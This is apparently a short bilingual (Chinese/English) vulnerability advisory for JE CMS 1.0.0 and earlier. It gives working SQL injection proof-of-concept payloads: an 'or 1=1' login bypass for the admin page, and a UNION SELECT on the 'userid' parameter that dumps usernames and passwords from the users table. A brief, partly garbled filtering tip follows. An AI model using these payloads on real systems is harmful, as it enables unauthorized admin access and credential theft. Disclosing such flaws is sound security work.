JE CMS <= 1.0.0程序出现两处漏洞,一处在登录验证可以使用万能密码绕过。另一处是SQL注入漏洞。

1. Bypass Authentication by SQL Injection Vulnerability //登录验证漏洞

in administratorlogin.php page, lines 16-20: //login.php页16-20行(代码省略)

POC:

in administrator/login.php


username: admin or 1=1

password: admin or 1=1

2. SQL injection in administratorindex.php on "userid" parameter: //SQL注入漏洞


in administratorindex.php file line 12:(代码省略)

POC:


?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--

安全防范:

严格过滤

过滤变量            or   替换位空